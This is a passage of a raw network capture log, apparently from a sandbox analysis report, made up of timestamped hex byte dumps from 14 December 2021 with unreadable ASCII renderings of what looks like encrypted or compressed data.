                                                          2021-12-14 13:10:57 UTC24INData Raw: 94 47 fb a6 f2 8f f6 4e 2c fb 0f 14 e6 95 dd 8f 70 1d 60 3f fb 4e 13 cf c2 3d be 61 f2 69 05 a4 b6 cc 2f 29 32 bd 66 af 55 c9 8c ef 56 6b 41 ff 38 d1 b7 5c be 0e 96 82 ac 4d de 2c bf 11 8e ac 99 71 41 84 d2 d3 7b cc fc 3f 78 8a 15 0c f7 ae cd 1d 35 90 4a 21 d7 4d b7 b0 32 3a 18 bd 1a 18 3f 0d 50 8c 17 45 e8 b9 68 ac b3 32 75 11 c1 46 1e 44 d8 0a b6 1a b7 48 02 fb e0 0a 5e 36 38 fb e3 d8 7d 51 dc 8a 62 b9 c3 83 5b 63 12 b3 3a ff 5a 18 94 a7 3c 78 49 44 4f 9e 27 ca 72 7c 2f d1 42 10 af 39 1b a5 7a f1 7f 6c 2a 96 1a 05 d4 dc ae f8 f7 68 e7 ab c6 61 b2 63 93 38 8b af af 6a db 39 b2 57 6d c4 3e f8 f0 3a 33 e7 c7 15 d0 d4 d0 23 72 0e 2e 40 1b f7 78 e5 06 96 1d e9 06 b8 64 f4 9f c2 5b 25 84 c5 cb 18 cc 92 8a 04 1f a5 1e 03 71 ef 9c 1a ef 86 6f 0f 8b 9a 56 4f 75
                                                          Data Ascii: GN,p`?N=ai/)2fUVkA8\M,qA{?x5J!M2:?PEh2uFDH^68}Qb[c:Z<xIDO'r|/B9zl*hac8j9Wm>:3#r.@xd[%qoVOu
                                                          2021-12-14 13:10:57 UTC26INData Raw: 50 0b f8 20 2a 43 75 8c d8 be ae eb 0f f6 fd 8f 98 33 c7 1d 94 24 35 8c 59 22 49 99 31 0d f3 7d 5f 88 f5 f8 3b f6 81 42 66 33 e1 74 90 b4 15 5e 15 a8 4c 22 63 9e cb a0 c5 64 2c 3c 35 16 6d d5 ba 04 29 99 68 df 5c 0c ae 4f 90 d4 26 53 e8 d8 f9 43 cb 7b 8f aa f0 eb 25 6d 6e 94 1d 93 a5 40 ac 21 5d f2 7a 08 5c e9 9a 3e da c4 ea d1 17 1b 20 e0 27 76 27 83 ca 52 28 6d ee 1e 1f 70 6a 6a e9 a8 81 68 f7 12 b4 e8 90 b3 32 ce 8f 5a cd 83 f9 67 5c c0 c4 83 88 d7 72 46 23 22 df 5b c0 93 af ae 3f b1 17 2f cb 90 7c f1 86 38 9c e2 75 fa b3 5e 6c 33 35 75 bc 2f 73 2e 9e 42 0d ae c4 b7 ee 4d 66 e1 c9 fa 33 15 f9 eb d7 48 68 95 b3 d9 bb 8b 7a 4f 3e 69 ed a2 28 a6 b1 27 7e 3b f4 4f 85 9d bc b6 d7 27 a5 fe 82 1f bb 3d 7e a0 b5 90 5a a2 01 ef e8 36 ef 61 c6 9e f0 f9 9f a9 eb
                                                          Data Ascii: P *Cu3$5Y"I1}_;Bf3t^L"cd,<5m)h\O&SC{%mn@!]z\> 'v'R(mpjjh2Zg\rF#"[?/|8u^l35u/s.BMf3HhzO>i('~;O'=~Z6a
                                                          2021-12-14 13:10:57 UTC27INData Raw: b7 d5 fc be 72 da 80 d2 2e fa 83 b1 25 0b fd 02 bd 47 91 f3 a8 ff 3a a8 d8 83 6f 43 90 f4 29 7e 7a 2c a7 92 4e f9 b1 d5 ba f0 21 35 7a 07 1e f5 99 11 e3 62 1b b6 2e eb 38 31 d9 94 21 bf 61 fc 4b 13 a8 ac 1c 14 02 30 ac 63 07 49 c8 8c e1 80 3f 4d e5 ee c0 a7 2b 9c 18 c0 9e ad 4d d0 17 a6 03 81 b0 67 46 4e 95 c9 44 a9 db 2a b6 8e ad 16 0d e4 bc d0 7a 09 98 24 3f c6 5c 9b 8e 3a 39 12 aa 3d 2d 2e db 49 03 1d 54 e7 95 a1 a4 b0 38 66 1d cf 3e 37 4c a8 d4 60 09 bc 62 19 f7 c8 18 77 12 32 f7 f8 57 6f 87 cf 81 bd 43 ce ab 4f 60 0d c1 04 f7 2b 0a 42 b4 37 52 53 48 67 8c 0e ee 78 6f 28 40 45 0a be 30 10 be 6b fe 7d 7f 3a c7 3d 1d aa de bd fd e2 4f f1 7e d5 68 8b 42 84 e2 96 f9 2a 41 db 3d 6e eb 6b c6 2f f5 fe 44 16 ef bc 35 c6 d5 d4 01 7c 1c 22 29 2f d2 78 ef 35 3a
                                                          Data Ascii: r.%G:oC)~z,N!5zb.81!aK0cI?M+MgFND*z$?\:9=-.IT8f>7L`bw2WoCO`+B7RSHgxo(@E0k}:=O~hB*A=nk/D5|")/x5:
                                                          2021-12-14 13:10:57 UTC28INData Raw: cf 4d a2 6b 19 d7 ec e0 34 51 9d d4 04 c3 3a a2 04 4e 20 10 20 55 05 76 25 59 66 1a 32 83 81 89 b6 c1 cb 58 ea f3 1f 33 68 66 bc 1f a7 52 64 94 ee ec ac db e5 d4 10 a1 23 16 9e 59 46 53 86 09 c4 f2 51 49 9a c7 c3 25 cf 98 4e eb 7d fa 6b 9a 59 1e 63 1a 94 2d 1f 71 85 c1 2c cf 71 50 f0 35 3a 6d d7 b5 36 ed 8b 63 ca 4a 70 2d 4f 81 c5 2a 4f 3e cb d4 49 d0 61 91 13 7b e0 3a 7d 6e 89 0c 84 aa 77 01 dd 5c d8 79 ad 49 e8 9a 35 cc c1 f5 e8 ac 74 33 eb 3f f0 0b 94 d5 7e 13 45 ef 0f 0e 78 c7 ab e8 84 8b 51 51 03 ba 34 ab e2 2d ec 96 56 1b 1f c9 78 7f 3f d6 a8 93 c0 6d 74 ed 32 d4 42 fc 0d b3 ae 2e ab 18 da db b7 63 f1 8a 80 5b fa 69 f1 2c 7a 6c 22 2f cc 53 25 4c 2f 8d 5f 12 92 cd 3b c1 47 75 e8 c6 e4 39 18 fe e7 5c a7 64 ae a6 5d b9 9d 6d 76 82 76 cb 56 0f 9b b2 33
                                                          Data Ascii: Mk4Q:N Uv%Yf2X3hfRd#YFSQI%N}kYc-q,qP5:m6cJp-O*O>Ia{:}nw\yI5t3?~ExQQ4-Vx?mt2B.c[i,zl"/S%L/_;Gu9\d]mvvV3
                                                          2021-12-14 13:10:57 UTC29INData Raw: cd 4c db 86 91 b5 8c 05 c1 08 4b c0 bc 04 2a 9f d3 21 af 9c f1 74 3b eb 3b f3 94 c0 5f bf e9 e0 3b 0a 8b bf e8 ff 91 72 dd 91 cf 52 c9 93 be 35 03 f4 0a b5 8b 93 da bc fe 3d a8 16 83 7f 4c 8a 33 2f 5d 55 2f b3 fd 13 fb a0 d0 77 ce ae 26 7b 07 1c c6 92 66 ec 73 5d b1 3d e4 3a 29 f6 b5 b5 be 61 b6 87 02 a7 b6 b9 21 0c 32 b7 7f 0d 43 44 a7 eb 8b 2f 51 dc 27 cb 25 02 8d 17 e9 99 88 5c df 1b af 03 ad bc af 7d 57 85 d8 59 62 c9 ea 2a 81 bb 09 14 df ba d3 6b 0c 98 16 38 f3 22 94 99 3b 33 09 99 23 1f 50 25 5b 0c 15 54 ca aa da 8c b1 32 7f 02 fc 28 42 77 a7 02 bc 0b 91 0f 23 f9 e0 06 67 16 2e ea ed d6 c2 3e f0 8f bf 58 d2 a6 44 21 80 e0 09 e6 25 03 b5 b6 1d 4f 6a 56 6e 8e 10 ae 5a 6a 24 51 40 63 8a 3c c6 62 6b d7 6e 48 24 ce 46 3e ab d4 a4 eb d4 51 cc 80 d3 66 9a
                                                          Data Ascii: LK*!t;;_;rR5=L3/]U/w&{fs]=:)a!2CD/Q'%\}WYb*k8";3#P%[T2(Bw#g.>XD!%OjVnZj$Q@c<bknH$F>Qf
                                                          2021-12-14 13:10:57 UTC31INData Raw: 4d 73 d9 e9 90 64 27 e8 43 9d 30 ce 29 ca 4c 81 d3 93 13 8f af 30 53 ae d5 df 4a 3b 49 ea 8f c8 40 f7 4e e6 41 89 4c bb ce f1 04 2a 6d 13 f3 08 c3 33 18 eb 45 1f 1f 29 54 08 6e 3e dc 5f e4 33 ae 90 92 ab cd d5 56 88 e3 3f 26 55 f8 86 cb bd 47 76 32 f0 f5 92 1e f4 d8 0c 9d a4 37 9b 4e 1b f5 86 09 f9 d4 4d 4b 96 ef e2 2b d0 81 a7 67 1b 61 6b 9b 4a 00 a2 91 82 53 2f 58 91 cb b1 d4 53 24 c1 34 3c 7c 49 b6 1e ff 8b 70 cb 59 14 a3 48 a9 de 39 4a 1c 7b c4 42 cd 6f a9 f0 dc e0 3a 76 df 9e 16 9a af 5b a8 ce 5c de 65 82 5f e3 83 22 54 ea e1 c0 0e d6 22 ea 3d 6d 30 87 d8 6e 36 62 c6 8e 06 6f 4d 82 65 83 8a 79 fd 17 ae 2a ab 1b 2d ec 96 69 dc 92 e2 72 dd 2f ce bc 88 d7 73 48 e1 2a 59 6b e4 80 b5 bd 22 bb 07 c7 dd 20 64 ec 9a 34 d6 e0 72 ff b7 d9 7d 2e 37 78 de 3f 53
                                                          Data Ascii: Msd'C0)L0SJ;I@NAL*m3E)Tn>_3V?&UGv27NMK+gakJS/XS$4<|IpYH9J{Bo:v[\e_"T"=m0n6boMey*-ir/sH*Yk" d4r}.7x?S
                                                          2021-12-14 13:10:57 UTC32INData Raw: 6d c3 12 71 17 68 e1 4b 71 8f dd 8b 01 a7 11 06 e5 97 d6 0e 51 a4 10 a6 84 a9 08 25 f9 50 cf 38 09 e4 2d cb 0b de 9a 8f 94 81 fa c0 2e 67 81 b5 1d 21 b7 f4 3f 51 9b b2 09 3c c7 66 fd b9 d1 49 b9 37 8e 0e 09 93 b8 c4 fa 88 9d da ac dd 2a d9 8d b7 32 dd e7 17 41 57 b2 df 97 b5 21 af cb 8c 63 b2 8b 0e 32 74 57 74 b1 44 10 e5 ad da a2 ed b0 27 57 0d 16 e3 db 91 f3 79 2e 7b 21 e9 3a 29 c0 42 34 92 63 e1 4c 02 ae a9 c3 f9 0c 1e bf 47 2d 76 4d 9b e0 a0 24 40 fa 72 42 b7 24 a3 15 fe 81 a9 68 90 13 61 46 8b e0 b9 64 89 92 f2 53 73 df cc 39 a5 90 16 0c f7 ef d2 6b 17 9f 38 02 f8 4d bb 8f c5 38 34 b9 2a 30 3f 05 42 f2 1e 69 e5 c3 82 a5 b0 36 06 58 df 31 27 56 bf 0e b6 12 a5 9e 09 d4 e2 1b 7a 12 30 e2 17 59 59 53 f7 8c 94 9d c6 81 34 2d 0c cb 03 cc 24 10 94 b4 08 52
                                                          Data Ascii: mqhKqQ%P8-.g!?Q<fI7*2AW!c2tWtD'Wy.{!:)B4cLG-vM$@rB$haFdSs9k8M84*0?Bi6X1'Vz0YYS4-$R
                                                          2021-12-14 13:10:57 UTC33INData Raw: 39 ab c7 8a 0f c3 87 fc 87 b2 14 4b 81 08 af 56 2e da 40 a9 e2 80 d8 25 b2 46 41 8f 7c 23 68 a5 2b 31 2c 64 34 d2 f8 90 1d 75 c1 52 97 3a c2 05 6c 4d bd 8e 9f 08 b0 af 3a 56 63 5c d5 52 20 5d 4c 89 d3 5d 6f 75 0f 4a 8e 5a c3 c8 2d 93 1e 7d 9f cd 02 c5 24 ab fe c1 bb a0 a4 4e 18 6c 23 46 61 e0 bd 18 ab 88 bb c1 c9 6a 1f da 1d 33 43 62 e4 91 a4 50 e0 59 e0 eb 52 95 3f c3 c0 06 13 26 97 58 3e 5b 90 12 6f fb 46 5a 2d 73 fa 3d cc 26 c5 60 34 f3 71 9c 62 02 73 10 88 5a 27 fe 32 d3 6b db 17 1c c2 34 3a 67 c4 b1 6e bf d1 4b 51 48 1f bf fb 1d c6 30 c4 a1 ce 0f 4c fa 70 94 7c e3 bd 8e eb 74 a5 1d 82 be 4c b0 da 5c 57 6f 20 4e a0 9a 34 c9 fd 76 c0 0f 7e 31 8e bf 7c 34 9e d8 76 b5 c1 ce f0 04 6f 4b a5 e3 ac aa 7a fc 05 c9 69 82 b8 27 96 b4 d6 cd 92 e8 7b 10 a6 c5 af
                                                          Data Ascii: 9KV.@%FA|#h+1,d4uR:lM:Vc\R ]L]ouJZ-}$Nl#Faj3CbPYR?&X>[oFZ-s=&`4qbsZ'2k4:gnKQH0Lp|tL\Wo N4v~1|4voKzi'{
                                                          2021-12-14 13:10:57 UTC34INData Raw: 1f aa d2 86 df f3 40 e1 c7 5e 67 9a 4d 98 3a a9 66 a7 6a d1 49 5c f8 6f c5 2d f2 fe 48 28 d0 ba 1d d6 d2 fc 2f 7f 0d 24 29 c0 d3 78 ef 1d 1e 3d 37 04 bc bf 0a cd c2 5b 2d 8a b6 ef 6e fe 9a 8a 0e 0a 85 38 4a 71 e9 be 51 a4 86 65 85 92 92 39 be a8 1f 91 ea 80 e9 f5 c0 fc 90 5f 02 5f 08 a7 cf aa dd 1b 60 bb 19 fa e1 a1 8c 60 dc 6a 3d 12 8e 85 54 6e d8 b7 4a fc 34 f9 97 84 eb dc 14 f5 6d f8 f1 1c 8a a5 d0 33 59 be bf b8 e8 18 75 c9 0a 8e 83 98 8b 48 c9 94 e7 ac 32 4d 0e 8f 19 a5 39 b4 da 40 a3 ba 8b c9 23 b7 4d 57 9e 75 ad df ca a9 78 28 46 71 c7 97 5d 72 20 ca 7f 33 ee d2 9a cf 33 ad cc b7 9e 9c a3 21 46 79 ff d5 52 2b 21 1f 9e c2 53 3d d3 df 46 9f 4a 97 68 94 b7 35 7d 95 e4 38 c0 32 bc e9 4a 1d 11 3d 5c 12 7e 0d 31 71 e4 39 a2 ab 09 ba c1 c9 48 7b 6a 33 31
                                                          Data Ascii: @^gM:fjI\o-H(/$)x=7[-n8JqQe9__``j=TnJ4m3YuH2M9@#MWux(Fq]r 33!FyR+!S=FJh5}82J=\~1q9H{j31
                                                          2021-12-14 13:10:57 UTC35INData Raw: f1 7e e7 a0 47 6c 2c 2e 0c 32 2e 55 23 9c 53 06 9d e5 b2 ee 3d 75 e9 d5 a4 28 15 f9 e4 cb c5 08 b8 b0 cb a4 e3 18 5f 25 7c c6 5e 52 c2 bf 25 6b 23 da 28 a2 9c b6 af d1 3d 93 e8 88 19 c5 01 60 b4 41 80 73 b7 6c d7 e2 1e f4 71 c3 8c 93 cc 8b ba fa 69 3a 4e 72 cf 3b ce 1f fc 25 e9 e6 95 79 da 38 89 77 c8 b7 eb 5e dc 00 d8 9b 69 76 74 11 c1 d2 c8 0a bf 3d 44 14 3b a1 40 8f 8c 16 48 fb e8 26 d6 db 41 6d e1 e1 46 15 9e f1 01 bf 5d 58 8e 8a 7f e0 62 30 c5 7a 5b cc fb 7e 12 e3 fd 2c 9e ab 6f 74 8c 21 f7 1a 51 4c ab 5b 55 bb c0 02 e0 a2 ba 61 76 f3 96 5b 83 58 e5 4b a2 8f dd 9a 57 ac 62 76 f2 9a e4 78 22 c6 11 a6 87 bd ff 2c dd 5d a5 2c 0c f3 fd a8 c7 c4 97 85 f2 bb 05 c1 08 70 91 cd 22 2d b7 f7 30 aa 8b 9b 1d 3d 84 16 e1 b4 db 51 ab d1 e0 0b 0a 8b bf d5 f6 8e 0c
                                                          Data Ascii: ~Gl,.2.U#S=u(_%|^R%k#(=`Aslqi:Nr;%y8w^ivt=D;@H&AmF]Xb0z[~,ot!QL[Uav[XKWbvx",],p"-0=Q
                                                          2021-12-14 13:10:57 UTC37INData Raw: a5 60 21 ce 0d ea 3e 03 93 a7 29 57 5d 4a b1 99 23 e5 63 7a 1c b3 4a 10 af 22 c8 7b 7f f1 6e 69 2d 11 28 30 a0 d7 b8 b8 3c 40 eb a8 df 74 9d 47 82 3f 9f d1 a6 46 ec 34 6a ff e3 d4 3e fa ed 2f 73 ff b9 17 f8 a0 d5 0b 75 28 03 43 15 c2 7c ce 06 6f 05 e9 06 be c8 75 9d c2 59 34 9e ac fd 7a e4 9a 8a 00 9f e2 b2 00 71 ef ab 37 fc 81 65 9e 84 86 a8 4a 84 16 e5 b5 86 c1 de ce e1 85 54 0c 4b 60 e0 30 ab fb 6c 35 9a 1d f1 f2 b5 8f 39 cc 7e 58 f8 ff 84 5e 4c 7d f0 b5 09 d8 e9 95 85 ec db 14 64 d1 69 59 30 9c a7 f8 27 54 b0 ba 81 f4 76 2b c2 22 f5 aa c7 80 64 82 98 e1 97 a2 4d 1f 82 17 a3 a8 2d f6 4b d7 e4 80 d8 21 b5 40 5e 82 6d 24 68 b4 07 65 d6 4d 4c d5 f1 b6 6c 3e d3 55 9d 21 c3 9d 25 47 ba cf a0 8c b7 af 21 55 13 cb 2b 53 06 4c 63 9b fa 38 1f 3d 26 3f fb 4c 19
                                                          Data Ascii: `!>)W]J#czJ"{ni-(0<@tG?F4j>/su(C|ouY4zq7eJTK`0l59~X^L}diY0'Tv+"dM-K!@^m$heMLl>U!%G!U+SLc8=&?L
                                                          2021-12-14 13:10:57 UTC38INData Raw: 2d ea b4 ff cd 92 e8 17 45 3f c5 a5 84 ee 39 5f f5 37 aa 24 e4 80 b0 86 6f a9 0b d7 e2 02 75 e0 87 4d 70 f0 7e ed a6 6d f1 20 2e 68 3c 4e 5f 23 98 7b 98 84 d5 b0 c6 f9 75 e9 df 86 12 14 e8 fa c6 9e f6 bb b0 c7 d6 f0 7a 5e 21 5e 6b 5e 29 8c 97 9b 6f 30 d6 34 be 9c b6 af c4 10 c0 ee 99 19 d4 46 61 b4 4f b9 dc ad 03 f8 cb a0 fe 60 cc fb c6 e7 8a b0 f6 42 b1 2a 73 c9 4f bd 1b ed 24 ae 69 96 79 d6 03 30 66 cf ac 80 72 cc 04 5c 2a 69 24 74 11 c1 b6 69 11 ae 32 38 77 11 c2 58 81 cb f3 48 fb e8 f6 0e d9 27 5c e6 e8 23 4f 97 d9 24 63 55 55 cc 9f 55 a9 61 32 76 7a 5a d6 e8 7a 01 e7 4d 9b 92 c2 55 6b 88 32 fe 0c 40 44 8e 72 1e da d1 00 7a b1 bc 70 6b c4 ba 7f 04 58 ef 58 ea 9e d8 a3 72 a7 11 1d df 93 ff 71 59 ad 38 17 8d b0 f0 35 dd 4e 1c 28 05 e2 ff d6 56 4a 20 bd
                                                          Data Ascii: -E?9_7$ouMp~m .h<N_#{uz^!^k^)o04FaO`B*sO$iy0fr\*i$ti28wXH'\#O$cUUUa2vzZzMUk2@DrzpkXXrqY85N(VJ
                                                          2021-12-14 13:10:57 UTC39INData Raw: bd bf b6 b4 19 5a 02 da 5e ef 5d a6 08 c2 b7 b3 60 09 f4 e6 0e 7e 7d bf fa e9 52 62 3e 54 8f bf 58 ae 0a 5a 61 07 e3 14 e5 24 16 bc 80 38 50 48 28 83 98 0f e4 63 78 4a 96 4a 10 a5 10 0e b6 55 e0 7b 1b 0e ef 29 1d 86 d8 bf fc 86 7b eb a8 c7 08 cd 47 93 32 5d f1 b2 4f f3 0a 6f f8 65 c9 28 77 fa 40 00 ff b2 35 e8 d4 d4 01 a1 0a 28 29 e0 d3 78 ef 26 11 3f e9 06 bd a5 65 9d c0 5b 21 9b dc 90 01 a4 9a 8a 04 1b 8d 10 06 71 93 34 3e fa 9c 65 8f 82 89 66 48 a8 48 9a f9 86 96 da c3 ed 80 40 09 62 24 fa ce aa d7 65 38 a2 e7 f1 de bc d4 95 cd 7e 58 da 97 96 5b 46 55 b2 51 08 26 d9 8d 80 c4 e5 13 7b d0 bb 65 00 99 aa d8 33 50 ae 44 a8 c8 7e 13 39 0a 84 ab d8 83 5b c6 87 fc 81 b8 b3 0f a9 0d b9 5b 32 c9 45 a9 b8 85 c4 db a7 6a 4a 8d 56 a9 69 a5 0a 6b 2c 51 73 d6 f8 8b
                                                          Data Ascii: Z^]`~}Rb>TXZa$8PH(cxJJU{){G2]Ooe(w@5()x&?e[!q4>efHH@b$e8~X[FUQ&{e3PD~9[[2EjJVik,Qs
                                                          2021-12-14 13:10:57 UTC40INData Raw: ea 8e 1e df ff e1 c0 0f 75 1b e1 27 7c 34 ce d5 65 4f 76 e0 15 04 6f 4a 96 e8 b0 8a 20 71 03 ac 3e 83 b8 2d ec 9c 91 cd 9e 3e 78 6e 24 c5 af 83 dd 49 5b f5 df d4 44 e4 da b4 ae 3f b5 07 5c e1 bc 75 e1 9e 2a 5b f9 68 f1 3c 54 64 35 38 f2 53 26 47 35 00 42 0e 9f c3 2a ff 4f 6f ff 49 f8 20 0e fe 6c d1 be 75 af 2c d0 a0 8d 6c c2 34 7e d5 4a b5 9b b7 3a 66 26 40 4a 8c 82 bc b3 5e 29 8a f2 92 09 36 37 69 bf 49 88 71 b9 1c f2 cb 08 ff 60 cc 96 72 51 95 aa 2a 7d c4 a5 58 cf 31 dc 17 ef 3f 89 c5 82 7b 5e 9c 91 69 15 8e f9 49 cd 0e 25 bb 07 5a 73 02 cd c6 06 9d 85 38 2b 71 29 a4 42 08 54 62 4c 75 55 20 1f 0b 5f 97 6a c3 29 42 9f fc 03 6b db e8 fe 8d a4 f1 6d 0c da 6a 72 c6 fa 7e 1a eb d5 25 92 fb e1 cd 9d 24 79 ad 89 64 b3 5a 0f d9 e8 9f e0 a2 b0 70 6b c0 95 4f 0d
                                                          Data Ascii: u'|4eOvoJ q>->xn$I[D?\u*[h<Td58S&G5B*OoI lu,l4~J:f&@J^)67iIq`rQ*}X1?{^iI%Zs8+q)BTbLuU _j)Bkmjr~%$ydZpkO
                                                          2021-12-14 13:10:57 UTC42INData Raw: 06 53 75 e6 fd 27 a5 ad 16 0c f1 ac ce 49 06 87 2e 29 d7 4c b3 98 0b 39 04 f7 32 32 25 0d 5a 0d 04 75 e0 bd f8 a0 b0 32 2a 13 de 20 5e e7 a6 02 bc 10 b5 48 cc f8 e0 0a 19 d4 38 fb e3 70 e6 50 dc 84 d0 c6 c0 83 51 72 08 da 0c f2 0c 7c 97 a7 3e 46 cf 40 4f 98 0e fa 66 68 0d f2 4a 10 a5 15 d7 68 78 fb 72 7f 30 fb 01 71 a9 d4 a8 ee 7e 47 eb a8 c7 73 8e 53 bb 9b 81 2f ad 42 ca 3d 6f f2 7c c0 37 e6 63 7f 00 fe b8 0b f8 41 d5 0b 75 21 30 57 37 cb f4 da 0c 16 14 ff 2e 29 b8 65 97 ee 55 f7 d2 be f8 03 9a 8e 8a 04 11 9e 17 2b 7d 39 fe 3e ef 84 4d 9b 83 9a 5c 58 af 09 88 f1 f8 b3 db c3 f6 85 5a 1a 48 6f e9 c7 82 b4 74 3d bc 95 cf f2 b5 a6 3a cb 6f 54 f8 d4 85 5e 4c 52 99 4d f0 2c 28 16 86 ec ca 02 72 d6 e4 ce 1d 8a a5 cb 28 44 ba a8 80 cc 19 28 c8 0c ac 3c c6 8a 42
                                                          Data Ascii: Su'I.)L922%Zu2* ^H8pPQr|>F@OfhJhxr0q~GsS/B=o|7cAu!0W7.)eU+}9>M\XZHot=:oT^LRM,(r(D(<B
                                                          2021-12-14 13:10:57 UTC43INData Raw: 72 e1 59 08 da 69 83 cf 3f 5b 37 f1 51 4a da 76 fa 56 e1 e0 3c 71 6c ae 72 9a bf 5f 8a 01 53 fb 47 17 4e e8 90 27 ff fd d9 c0 0f 7e ed e1 36 6f 23 42 c6 6c 2a 65 ff 24 3a 1a b6 6b 17 95 81 6e 2a 10 b1 2f 88 a9 07 d2 1d bd 32 6d 3c 77 5a 16 f2 af 82 cc 6a 74 dd 09 d4 44 ee 5e b4 a8 04 ad 21 d1 ca bc 34 d4 8d 22 4a f1 7e e7 3e 47 6c 22 43 6c 42 2e 54 26 9c 53 09 86 d5 b6 f4 47 75 e8 d5 e9 28 15 f9 f0 c0 b6 40 bc b0 c1 92 95 7a 5e 2a 76 cb 5c 33 8a bf 24 7c 00 db 5b 9d 9e b6 a5 a2 38 82 fc 8f 0c a0 1e 68 b7 4b 91 76 be 09 e0 1d 1f d2 6c c0 bc 5f e7 8a b0 e3 6c 0d 21 60 c5 31 cc 11 f2 3d 78 cc b8 70 e8 c7 8c 66 cf b9 f1 5b c7 04 47 26 19 4d 8b 10 e7 d0 2e ca ac 38 2b 6f 22 b2 40 86 f2 79 56 e8 1c fb 24 d8 70 89 e5 e8 29 5d 8a e2 01 63 44 55 fe 93 80 e1 44 0b
                                                          Data Ascii: rYi?[7QJvV<qlr_SGN'~6o#Bl*e$:kn*/2m<wZjtD^!4"J~>Gl"ClB.T&SGu(@z^*v\3$|[8hKvl_l!`1=xpf[G&M.8+o"@yV$p)]cDUD
                                                          2021-12-14 13:10:57 UTC44INData Raw: ca 07 07 1a fc 6f 2f 5b e1 32 eb 8b 24 49 d7 16 d1 a8 2f 81 10 c0 16 ac 4d d0 2c 3e 11 8e ac a6 7d eb 85 d8 59 60 ca ea 28 a0 86 3c 1d f1 bd d7 f1 0b 80 1c a3 d4 4d b5 f7 a6 39 18 b1 1e 2d 36 25 d1 0f 1f 43 87 41 b5 a5 ba 1f 71 1a d2 1a 23 4c a3 15 60 09 b6 71 0d e9 e6 82 c1 20 f6 f3 c1 18 76 51 da a6 33 51 c1 85 73 d4 0d cb 0f ec fa 05 b1 8f 0f 50 42 4d 5c 9c 7c 54 72 7c 2f 5b 62 28 af 3d cc b6 78 f7 55 6f 25 ef 29 1c aa d4 ae 8d 86 40 fe b2 c6 67 9b 5c a3 3c 81 a6 a6 6a db 5e 6f f8 7e db 22 d2 54 40 00 f4 91 90 d3 d4 d2 23 5b 0d 2e 4c 3e da 50 5c 0c 16 13 e2 75 06 b9 65 97 c8 5c 48 48 be f8 0b a1 95 9c 17 15 b5 5d 01 71 e9 a5 31 fe 88 ff 9c 87 8b 52 63 99 1f 9b f3 ab c4 e2 f1 fd 96 53 1d 5e 14 76 cf aa d1 67 3a 64 0b d5 da 82 a7 29 c7 6d 5a f8 b6 85 5e
                                                          Data Ascii: o/[2$I/M,>}Y`(<M9-6%CAq#L`q vQ3QsPBM\|Tr|/[b(=xUo%)@g\<j^o~"T@#[.L>P\ue\HH]q1RcS^vg:d)mZ^
                                                          2021-12-14 13:10:57 UTC45INData Raw: 9c d7 b7 25 cf 92 48 63 0a 71 6a 9b 40 7b fc 11 82 59 41 fc 84 cb bb f6 cd 3f c2 32 29 60 ba 22 1e ff 80 70 c6 36 8c b5 4f 8b dc 33 34 85 d9 d5 43 c9 78 83 6d ea 8f b2 76 7d 89 0a 58 ad 4c 93 d3 64 25 6f 20 4e f9 93 25 d4 fd 74 c3 0f 72 5c 6b 26 7c 32 bc 43 7c 3b 70 f8 27 2a 6f 4b 9e fe c4 5c 79 fc 03 ab 37 92 b4 05 7b 9f 41 cb fd 68 79 7f 38 d6 a9 93 cf 68 50 dd a9 d7 44 e2 ef 3e af 2e ac 18 db db b5 64 ec a5 bb 49 f1 78 88 2a 44 6c 24 06 d6 42 2e 59 30 94 42 0e 92 2b b7 ff 4f 0b 7a d5 e9 22 03 c0 de c0 b6 63 af 4e c0 c8 bc 5f 4f 22 5a ea 74 6e 8b bf 2f 7e 39 cd 57 ac ff b5 a5 c4 57 08 ec 99 19 c5 be 61 b4 41 80 71 87 b4 fe e3 18 ed 68 d7 92 d4 69 8b ba fa 47 51 39 79 e7 be dc 1b e7 0d bc dc 9c 55 e6 58 ac 64 cf a0 fc 45 dc 09 47 2a 69 72 77 11 cd c8 1b
                                                          Data Ascii: %Hcqj@{YA?2)`"p6O34Cxmv}XLd%o N%tr\k&|2C|;p'*oK\y7{Ahy8hPD>.dIx*Dl$B.Y0B+Oz"cN_O"Ztn/~9WWaAqhiGQ9yUXdEG*irw
                                                          2021-12-14 13:10:57 UTC47INData Raw: 10 a4 92 42 e8 ad c8 a6 e7 48 37 7d 68 10 e7 91 0a fe 71 35 a7 3d e4 3c 2d f6 48 34 be 61 85 43 03 a7 bc d9 00 25 91 be 6c 29 4e c4 9e e6 a3 8b 41 ff 3e c0 a4 3b 81 3f c6 88 ac 4b c9 0f a5 19 9f ad a0 52 2e 80 d9 53 79 de fe 13 62 ad 16 0a e4 a4 d4 43 51 8b 34 2f b8 65 b1 98 3d 3f 09 bc 5d ee 3f 0d 50 63 3b 47 e8 bb b3 8d 27 32 75 19 cf 37 42 8f a6 02 bc 32 d5 61 08 f2 8f 1b 77 12 32 94 cf 5a 75 57 da a6 19 51 c1 85 34 4b 0f cb 0f e0 2f ce 81 82 10 67 42 47 45 8b 06 9d 50 7e 25 57 41 38 97 3d c6 62 a6 f1 78 44 34 ff 29 1c aa d4 a8 f8 00 b9 eb bd dc 67 9a 46 88 08 82 2f fb 6a db 3d 31 f8 6f d5 4d 40 ef 40 0a f4 bf 63 fc d5 d4 0f 57 1a 2c 46 35 fb 2a e6 0c 10 3d f1 04 bc bf 0a 5b c2 5b 2d 45 b0 dd 29 85 9a 8a 0e 17 a5 28 00 71 e3 6a 3e e9 f8 49 8e 83 9e 7e
                                                          Data Ascii: BH7}hq5=<-H4aC%l)NA>;?KR.SybCQ4/e=?]?Pc;G'2u7B2aw2ZuWQ4K/gBGEP~%WA8=bxD4)gF/j=1oM@@cW,F5*=[[-E)(qj>I~
                                                          2021-12-14 13:10:57 UTC48INData Raw: c1 c9 69 81 f2 33 3b 2c d1 96 c7 af 3f 6d 22 fc e6 93 ed 6d d5 16 81 57 af 96 59 39 41 83 01 e2 f7 79 c3 99 ef f9 0c 66 91 59 60 0a 61 6b 9b 40 3c ee 10 82 59 25 77 ad fa b1 de 71 06 14 34 3a 67 c3 c2 93 fe 8a 65 d3 4e c1 a1 6a a9 f8 39 4a 1c ca d2 4f d7 58 ad 7c e3 ea e7 51 7f 8f 1d 93 b8 77 2a dc 5c d8 00 a7 4f e8 9c 19 da d3 cb d6 1e 72 5c 69 26 7c 32 83 0f 6c 2d 65 e6 37 88 6f 4b 94 f9 82 9b 71 eb 6c 33 3f 83 be 3e e5 8d 47 dc 9a f8 17 f6 3f c5 a9 91 cd 68 5a e4 39 cd 2b 6d 81 b4 a8 3d a0 1a d8 e2 33 74 e0 87 0f 02 e0 75 cf 2f 44 6c 28 03 51 53 24 77 ac 9d 53 0c ab e3 c5 cc 45 75 ef c6 e5 39 